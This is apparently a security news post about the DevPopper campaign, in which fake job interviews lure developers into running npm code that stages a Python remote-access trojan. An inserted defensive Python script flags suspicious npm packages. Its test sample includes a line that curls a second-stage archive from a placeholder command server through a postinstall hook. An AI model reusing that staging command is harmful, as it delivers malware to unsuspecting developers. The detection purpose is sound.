
Dream interview or trap? A new trend in the world of social engineering.

Friend

Professional
No developer is immune to the persuasive methods of hackers.

Recently, researchers from PolySwarm have documented several cases of sophisticated cyberattacks with social engineering techniques aimed at software developers. Scammers use fake job interviews to install malware known as DevPopper. This tool is a Python-based Remote Access Trojan (RAT) that is capable of infiltrating devices on a variety of operating systems, including Linux, Windows, and MacOS.

Attackers disguise themselves as employers interviewing for developer positions. In fake interviews, candidates are asked to complete technical tasks, such as downloading and running code from GitHub. In this way, victims unwittingly download malware onto their devices, giving the crooks remote access to the system.

After downloading the file containing the NPM package, an encrypted JavaScript file is run that executes "curl" commands through Node.js. This leads to the download of a second archive containing the next stage of the malware - the DevPopper RAT script in Python.
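A defender-side triage check for the staging pattern described above, added here as an example and not code from the post or from the researchers cited: it flags npm packages that combine install-time lifecycle hooks with JavaScript that spawns shell commands, invokes curl, or evaluates packed strings. The patterns, thresholds and both sample packages are constructed assumptions for illustration, not signatures from the article.

```python
"""Heuristic triage of an npm package for install-hook plus curl/child_process staging."""
import json
import re

# Assumed heuristics for JS sources (not signatures from the article).
JS_PATTERNS = {
    "child_process": re.compile(r"require\(\s*['\"]child_process['\"]\s*\)"),
    "curl_download": re.compile(r"\bcurl\b"),
    "dynamic_eval": re.compile(r"\b(eval|Function)\s*\("),
}
# Lifecycle scripts that run automatically on `npm install`.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")


def triage_package(files):
    """files maps a path inside the package to its text content.

    Returns a dict with the install hooks found, per-file JS pattern hits,
    a simple additive score, and a boolean verdict (score >= 2).
    """
    findings = {"install_hooks": [], "js_hits": {}, "score": 0}
    pkg = files.get("package.json")
    if pkg:
        scripts = json.loads(pkg).get("scripts", {})
        for hook in INSTALL_HOOKS:
            if hook in scripts:
                findings["install_hooks"].append(f"{hook}: {scripts[hook]}")
    for path, content in files.items():
        if path.endswith(".js"):
            hits = [name for name, rx in JS_PATTERNS.items() if rx.search(content)]
            if hits:
                findings["js_hits"][path] = hits
    findings["score"] = len(findings["install_hooks"]) + sum(
        len(h) for h in findings["js_hits"].values()
    )
    findings["suspicious"] = findings["score"] >= 2
    return findings


# Constructed sample mimicking the described chain: a postinstall hook runs a
# script that pulls a second-stage archive with curl via child_process.
SAMPLE_SUSPICIOUS = {
    "package.json": json.dumps({"name": "interview-task",
                                "scripts": {"postinstall": "node setup.js"}}),
    "setup.js": "const cp=require('child_process');"
                "cp.exec('curl -o stage2.tgz https://PLACEHOLDER-C2.invalid/s');",
}
# Constructed benign package for comparison: no hooks, no shell or download logic.
SAMPLE_BENIGN = {
    "package.json": json.dumps({"name": "left-pad-clone", "scripts": {"test": "node t.js"}}),
    "index.js": "module.exports = (s, n) => s.padStart(n);",
}
```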

DevPopper collects device information, such as operating system type, hostname, and network data, and sends this information to a management server (C2). DevPopper features include network session creation, data encoding, support for persistent connections for remote control, file system search and file theft, remote command execution (RCE) to deploy additional exploits or malware, clipboard logging, and keystroke logging.

Recently, Securonix, which first detected this malicious activity in April of this year, reported that the threat actors behind DevPopper have improved their methods and tools (TTP). They now target devices running not only Linux but also Windows and MacOS.

In addition, new malware variants have been added to the campaign. The updated DevPopper has advanced features, including improved FTP functionality, support for encrypted data transfer, and the ability to steal stored credentials and session cookies from popular browsers.

Most likely, this campaign is the work of North Korean hackers, as it has similar features to previous attacks originating from the DPRK. Users in South Korea, North America, Europe and the Middle East have already become victims.

For those IT professionals who work in the field of software development, this information is a wake-up call that underscores the importance of caution when interacting with potential employers online.
